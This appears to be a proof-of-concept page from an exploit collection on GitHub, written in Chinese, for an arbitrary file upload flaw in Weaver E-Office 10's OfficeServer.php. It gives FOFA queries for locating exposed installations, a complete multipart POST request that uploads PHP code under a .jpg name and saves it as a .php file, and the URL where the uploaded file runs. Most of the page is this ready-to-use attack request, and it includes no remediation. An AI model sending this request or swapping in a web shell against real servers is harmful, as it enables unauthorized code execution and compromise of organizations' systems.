Skip to content

Latest commit

 

History

History
47 lines (30 loc) · 1.2 KB

泛微E-Office10-OfficeServer任意文件上传漏洞.md

File metadata and controls

47 lines (30 loc) · 1.2 KB

泛微E-Office10-OfficeServer任意文件上传漏洞

泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器敏感信息。

fofa

app="泛微-EOffice"

body="eoffice_loading_tip" && body="eoffice10"

poc

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept-Encoding: gzip, deflate
Connection: close
 
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
 
<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
 
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

image-20240524231729186

文件路径

http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php